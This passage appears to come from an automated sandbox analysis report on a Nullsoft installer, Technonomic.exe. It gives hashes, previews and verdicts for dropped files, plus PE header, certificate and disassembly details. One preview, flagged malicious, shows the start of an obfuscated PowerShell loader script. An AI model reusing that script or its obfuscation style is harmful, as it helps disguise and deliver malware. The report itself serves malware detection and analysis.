                                                                                                                                                                    Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6656
                                                                                                                                                                    Entropy (8bit):5.139253382998066
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
                                                                                                                                                                    MD5:1B0E41F60564CCCCCD71347D01A7C397
                                                                                                                                                                    SHA1:B1BDDD97765E9C249BA239E9C95AB32368098E02
                                                                                                                                                                    SHA-256:13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
                                                                                                                                                                    SHA-512:B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: Azygoses125.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: WYnv59N83j.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: t6V3uvyaAP.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: WYnv59N83j.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: t6V3uvyaAP.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: Unspuriousness.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: Unspuriousness.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):10761386
                                                                                                                                                                    Entropy (8bit):0.6132307073228342
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:k77CgAkDXAMJvi2+FOmjH23Z+bh7A+LOj3XL:k77CgAkDXAMJvi2+FOeH8chEeOjnL
                                                                                                                                                                    MD5:68BF2A02BC67F4799AC7D72544F6F5A0
                                                                                                                                                                    SHA1:01C83C284D7077657AF6192E4E02607AA0AA52D6
                                                                                                                                                                    SHA-256:7F34186FB78A0D9705709B6BBF4033E1D23E52FA8307F1E2287D618DA2DB45F2
                                                                                                                                                                    SHA-512:34DD2272745D85B8BB3623E0407719D358AB995663826ADD7A2618A782C7C790239ADC22BC603143335F9D4857A48725783893A1305667EEC1DB0773051A4551
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:./......,...................q... ...............~/..........................................................................................................................................................................................................................................G...R...........=...j...............................................................................................................................#...........6...,....(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2387610
                                                                                                                                                                    Entropy (8bit):0.15942566220329682
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:wzAcmELvlCt64oADSmhDEZNe508HYwhsi6zgTmx5upMjAthZFH/Jd3gmXTQu5Y+U:
                                                                                                                                                                    MD5:87E50D263F04628637C01FDD66A8F091
                                                                                                                                                                    SHA1:C6B097FD62805352C893727A5EDA4BEEDE2E413C
                                                                                                                                                                    SHA-256:F59F52215B994807B8ECBB7804CA1C8B4214A8BAAA2DD465E49080B695410842
                                                                                                                                                                    SHA-512:3E0BF1BDFEBFF9C29E0C82B0E37EBEC4FE6D94954391658F6CD95E485B76AA7E6FAE87CB70E809684B060A5C966855EE9EB4E8EEB6F178A23BA1E5B69F7954F7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.....................................................................................................................................................&................................................................................................................................................................................................................................................#.....................................................................................................................................A..........................................................1.............................................................................'.................................................................u..................................................................................................................................................................................................................................................%.............................
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (4383), with CRLF, LF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):70033
                                                                                                                                                                    Entropy (8bit):5.190030481065896
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:tuDLO/GtnuIxGnnWmgcrNKXdFzn3H9zWnvP+arhDeBTFBEndqHnRHw+dI5:tSLO/LiGnvBro7WvPDrZeB5HRs5
                                                                                                                                                                    MD5:976EB0849970C5CB55573F0E7353C3EA
                                                                                                                                                                    SHA1:4DE6AC2DBC2C6426577A0D0A00E5CDC67A063F83
                                                                                                                                                                    SHA-256:E9BEE48A708248F9CA1407265D0F8FF57D6FB50B77875A4A540CB653762F882B
                                                                                                                                                                    SHA-512:1FAE421A9F2F06F0B96B5F6E6127E656406ED31A89E93FD0D21D130E46F1317B6771336E3D46F2596C3010A98134A6B842D807333FE31E41DE25FFAD47BFD593
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:$Tackles=$Jomfruhaars;........$Tomatpureer = @'.Dressma.Morakke$ MonstrLCricklesT eelikeProni.yrH lpenssOrinidokHort.nsaEkskursrInaurateEncha.erAnonymisForstan=S lphin$InhabitD ExecuteSyslersbForlngeaUn,ercltLabouremRewrotedPelf iceakantusr Snreli;Arbejds.ForfatnfBi ritsuB.nvarmnKonsekvcA.lssentSystemfioriencyoClinkern Gullyg StenogrDElek,rorDamasceeOaflsnicTru petk Gamlins Ablast Afprv.i( Aseism$AppendiSRacyurocT,ninger.tommisaPithingnJordbaekD ssejlyLnramme,Funktio$plantigL P,pliniumyndigtSolopgazunsensliSkample)Gen.ral Outspok{Ridgeb...odregn.Va ieta$SektormFDec,nceiForegglp VeracisGe.brugkDigtning CothurgBlad one MedkmpnShockereChromat Natu al( CollatROrdetbeiSupershgB mestraNeatsoruS amefadComposioPimentanSmre opsLnsum e Escoche'MedkmpeT Pawpawa Billedr Armstrdplett tiSldefareDiktatu,Pe plek$Vlvens,TdogfennoAmbit.opByzo,erlErstatnePlato,idUdestaaeMalonylS aniljeBFrowstirRiveresuAfmarchiFlsomhes drivseGaardmn.havredyc Danaid flneri EXemeatat ProtogfTellsomapyrog ugCochylis tet as
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):777472
                                                                                                                                                                    Entropy (8bit):7.9548733986615385
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
                                                                                                                                                                    MD5:C174A412BE6F74C3323AE8D6D4737086
                                                                                                                                                                    SHA1:C703DAA5DF8C281206A8D85B582B8A1B729748F5
                                                                                                                                                                    SHA-256:BB71B94948E6929047BDE8DF94C187FBB6F2CC0119A0C386F84B9EA144AABD67
                                                                                                                                                                    SHA-512:9F2B95174FD1283964EA61E6DBE07C450ED0A01AAD6B3852C43EF6811A92878F0F123DFBC1F88B2CF05479A94AF098591BD579F3C3581521819F3B12D20DFA42
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P..s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.......3............@.................................*X....@.............................................................8............................................................................................text...^a.......b.................. ..`.rdata..p............f..............@..@.data...X............z..............@....ndata...@...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):398
                                                                                                                                                                    Entropy (8bit):4.246758482060977
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:oqMiL/AZwy9A2YYut9HLv4CDGcL+iEnHE9DChVgwCtMWIX0FWWAz6CJArAkyVMIb:vMiL/RDttZPDpL0nHlVg1tXqMWjhb
                                                                                                                                                                    MD5:A01CF8B2F34D6F8D6A6067AD87AD420F
                                                                                                                                                                    SHA1:C49BFD81A1418697165CB62EDBEEF5E8D47157BA
                                                                                                                                                                    SHA-256:A85ACBE8F4FAD0CA373D1BC143633962C89D69E1503A3C310E283DA4EF97B4D7
                                                                                                                                                                    SHA-512:B4784A1754ABE449C17A5B88E2D4ECA4D0B9A80E5A20416B80CAAF8989FAB9A6BABCD711691D91246C9B1F12BA7C01FD00450AF247AB4E4B64174E79466636D9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:huskers kvierne workingman.maanedsmagasinerne patriotical torpederinger baromacrometer tubful synchronousness logeion syvendelenes cadere spasmolysis..djvlekultens conscripting nebulium snary streamerbaand balfaldaras nonbeatific unwitless diplomate..ressagernes indifferensen inositols saltningen flimsiness.fusioneringen papists taknemlighedglds transpirering,lkagernes frokostmders farthingdeal.
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5161744
                                                                                                                                                                    Entropy (8bit):0.15808018941602964
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:T+W5rfWR61urINGFhHyjTYYfH8tfhDPzQnR64u4EMMHPdu6izJlM/j2ZGoDuTmnj:moVSf
                                                                                                                                                                    MD5:862F3B806ED8EE61690B5CB807E4039F
                                                                                                                                                                    SHA1:63579479347755219148DB8926C9FAE8FF3456A4
                                                                                                                                                                    SHA-256:B8664ACCEAFF8EDC30B830CCEE20BF79BAC7D003169E8BD7A4C7FB025BBC83A7
                                                                                                                                                                    SHA-512:64B1617EB008A3496732D5737F2602F47796B6342DE64498BB93E1A3D94487FA1167DD008400FD19C46DF013FD6C211420AF4C33A9BAC3E15D13C5BE5984430B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e.....................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):320608
                                                                                                                                                                    Entropy (8bit):7.662297766029789
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:i77CgAkDXAMJvi2+FEsMPNtnD6sa56B+29SknGxGzLY6HoOIMmrSt4Jfk8jFhnXn:i77CgAkDXAMJvi2+FOmjU+2932x6PGxU
                                                                                                                                                                    MD5:A9DC6D94FDB2C6592B4832C3F06CA195
                                                                                                                                                                    SHA1:89D856BD799A41348F5DBE6667A8223561CA1572
                                                                                                                                                                    SHA-256:523E1B41AA618625328EAB0ED0DE332EC4078DDED26EE1753180F4E45DB84C38
                                                                                                                                                                    SHA-512:F84D597A69E1D8130CBB97F2343983ABC1525F1F33B9021C90D7E6B9952D61FE697050B32B7EB4EC13BAB11DF3211DA4DA9E20B4F3B4E0D38227A61AFA0E5A01
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.................77.ggg...JJJ...+.<.......S.......r.RR............................&......"""........EEEEEE.........:.+.8...................................................w..................!!....]...O.........aaa.........................t........||||......UU......A...................h................9.....ZZ..........333333....J..........................P........g...........................................T.....c.H.......\......{........VVVV.....s..22............xx..}}.....P...........333.......^^^........wwwww.....H.-.D...+.. .G.................t.+.......................!.@@@@@@@...................d.WWW.}}.VVV..11........ ...................!...................q......).d.....SSS...........................oo..........999.::....=....B.........@...............................3...........LL......k......&..............w.#.....P.........................88....................1.^^..ss........................................(.z..|.............k.|...............E...............s.....U..[[[[...
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2802123
                                                                                                                                                                    Entropy (8bit):0.16014721035839247
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:RaE9710bnra8qiClzbvAx57Ano7sKqOSTiTSqBoChrYB6j2QwGcklvNWuxDgQ4uv:C
                                                                                                                                                                    MD5:A7D919B312C1C74AB4C35A522D946B77
                                                                                                                                                                    SHA1:80DBDC65B19CFB6CBE8AECFA41D28F450857DCC5
                                                                                                                                                                    SHA-256:09C869BFBB2A5B7CC84D9E0F56C4F9FA728E1F23C2415DDC0E74FC3D39AA6154
                                                                                                                                                                    SHA-512:389824FE2C76C6C2204A56ACC7A160D133279B1C0C1F4A0635DA9351C4D82661D31DF2C536DC2A238F040A23AED46ADDD62657350EDFBA6820869B5B9C0473A5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.............................................................w............................................................................................................................................................................................7..........................................................................................................................................................................^......................................................................................................................................................................................................r....................d..............................................................................................................................v.......................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                    Entropy (8bit):4.187889194919351
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:bovixgS7v4M2L:TgS7gZL
                                                                                                                                                                    MD5:E23F52386361095BDB7040B09E2216AE
                                                                                                                                                                    SHA1:91F31DD82AB80140DB621B6DCE0B9B5D6B568723
                                                                                                                                                                    SHA-256:36467321184A76E0FEA592D2896856A37EC18FC8480DE66F05D719D93B39D070
                                                                                                                                                                    SHA-512:19D18DE54B3466F0D283271786B3B308C3BE07F21174C46563C4C16292716C52F2C1B85F416ED77143EA6847BFC4C4C37F22296948EAC47499276B181F129B9C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:[gap]..predespond=fascinatingly..
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                    Entropy (8bit):7.9548733986615385
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:Technonomic.exe
                                                                                                                                                                    File size:777'472 bytes
                                                                                                                                                                    MD5:c174a412be6f74c3323ae8d6d4737086
                                                                                                                                                                    SHA1:c703daa5df8c281206a8d85b582b8a1b729748f5
                                                                                                                                                                    SHA256:bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
                                                                                                                                                                    SHA512:9f2b95174fd1283964ea61e6dbe07c450ed0a01aad6b3852c43ef6811a92878f0f123dfbc1f88b2cf05479a94af098591bd579f3c3581521819f3b12d20dfa42
                                                                                                                                                                    SSDEEP:12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
                                                                                                                                                                    TLSH:70F4232B3349C513C473A271E816AFF1C6E81DA2D565C68F67207E2938BB3C359593B2
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....
                                                                                                                                                                    Icon Hash:070b4d61782c178f
                                                                                                                                                                    Entrypoint:0x4033b6
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:7192d3773f389d45ebac3cc67d054a8a
                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                    Signature Issuer:CN=Skovsneglen, E=Nonimplication99@Hjovnen.Ke, O=Skovsneglen, L=Heuchelheim, OU="Salpingostomatomy Wickies ", S=Hessen, C=DE
                                                                                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                    Error Number:-2146762487
                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                    • 13/07/2024 05:35:45 13/07/2025 05:35:45
                                                                                                                                                                    Subject Chain
                                                                                                                                                                    • CN=Skovsneglen, E=Nonimplication99@Hjovnen.Ke, O=Skovsneglen, L=Heuchelheim, OU="Salpingostomatomy Wickies ", S=Hessen, C=DE
                                                                                                                                                                    Version:3
                                                                                                                                                                    Thumbprint MD5:AC528614DA7ED49EBCB7556EFC280D19
                                                                                                                                                                    Thumbprint SHA-1:64C8E8BE1AB377C991BA18B0D7D159956383E7C9
                                                                                                                                                                    Thumbprint SHA-256:C904F9A60F606786BB3246FAB58A97197A72EF9A58CB3D90156677800C6DFE55
                                                                                                                                                                    Serial:5E8F74E19A3AB88E76AA9AED28EE1AC63D35F58F
                                                                                                                                                                    Instruction
                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                    push ebp
                                                                                                                                                                    push esi
                                                                                                                                                                    push 00000020h
                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                    pop esi
                                                                                                                                                                    mov dword ptr [esp+0Ch], ebp
                                                                                                                                                                    push 00008001h
                                                                                                                                                                    mov dword ptr [esp+0Ch], 0040A230h
                                                                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                                                                    call dword ptr [004080B4h]
                                                                                                                                                                    call dword ptr [004080B0h]
                                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                                    je 00007FF2B9353AC3h
                                                                                                                                                                    push ebp
                                                                                                                                                                    call 00007FF2B9356C1Eh
                                                                                                                                                                    cmp eax, ebp
                                                                                                                                                                    je 00007FF2B9353AB9h
                                                                                                                                                                    push 00000C00h
                                                                                                                                                                    call eax
                                                                                                                                                                    push ebx
                                                                                                                                                                    push edi
                                                                                                                                                                    push 0040A3B0h
                                                                                                                                                                    call 00007FF2B9356B9Bh
                                                                                                                                                                    push 0040A3A8h
                                                                                                                                                                    call 00007FF2B9356B91h
                                                                                                                                                                    push 0040A39Ch
                                                                                                                                                                    call 00007FF2B9356B87h
                                                                                                                                                                    push 00000009h
                                                                                                                                                                    call 00007FF2B9356BECh
                                                                                                                                                                    push 00000007h
                                                                                                                                                                    call 00007FF2B9356BE5h
                                                                                                                                                                    mov dword ptr [0042A264h], eax
                                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                                    push ebp
                                                                                                                                                                    call dword ptr [004082A8h]
                                                                                                                                                                    mov dword ptr [0042A318h], eax
                                                                                                                                                                    push ebp
                                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                                    push 000002B4h
                                                                                                                                                                    push eax
                                                                                                                                                                    push ebp
                                                                                                                                                                    push 00421708h
                                                                                                                                                                    call dword ptr [0040818Ch]
                                                                                                                                                                    push 0040A384h
                                                                                                                                                                    push 00429260h
                                                                                                                                                                    call 00007FF2B93567D2h
                                                                                                                                                                    call dword ptr [004080ACh]
                                                                                                                                                                    mov ebx, 00435000h
                                                                                                                                                                    push eax
                                                                                                                                                                    push ebx
                                                                                                                                                                    call 00007FF2B93567C0h
                                                                                                                                                                    push ebp
                                                                                                                                                                    call dword ptr [00408178h]
                                                                                                                                                                    Programming Language:
                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84bc0xa0.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x1c5c8.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xbd5c80x738
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x615e0x620041c79e199a2175acbe73d4712982d296False0.6625876913265306data6.4557374109402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0x80000x13700x14009cbedf8ff452ddf88e3b9cf6f80372a9False0.4404296875data5.102148788391081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
